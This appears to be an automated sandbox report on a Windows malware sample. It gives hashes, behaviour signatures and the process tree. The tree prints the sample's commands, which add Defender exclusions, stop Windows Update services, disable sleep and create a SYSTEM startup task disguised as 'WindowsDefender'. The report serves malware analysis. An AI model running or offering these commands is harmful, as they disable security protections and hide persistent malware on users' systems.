Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
39s -
max time network
80s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
30/08/2023, 04:36
General
-
Target
5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3.exe
-
Size
5.7MB
-
MD5
98775ff23cbc45e7ad6c81974270d4cc
-
SHA1
3de0012444ba5050863b7d5ba164d680d04a1539
-
SHA256
5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3
-
SHA512
eb3f59dd4780fe77a3e3f5560f7d7389a80441412cd192e3ed0e30c02bb25559caa59b2c08035283499f6eb74353a1f31a123066e09a967adfeeb112af5f327c
-
SSDEEP
98304:S0TVWEzKhoqXr+bTk0OUNAhqFabD/JpYPAKUwHbJBjL+nzEHiKUrvVrOIgB:Spr+vk0OgAheafDYPAKUSbEP
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Stops running service(s) 3 TTPs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3.exe"C:\Users\Admin\AppData\Local\Temp\5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wakic#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefender' /tr '''C:\Program Files\WindowsDefender.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefender.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefender' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 476 -p 608 -ip 6081⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 668 -ip 6681⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 608 -s 6161⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 668 -s 22561⤵
- Program crash
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
4KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
132KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
5.8MB
-
Filesize
156KB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
164KB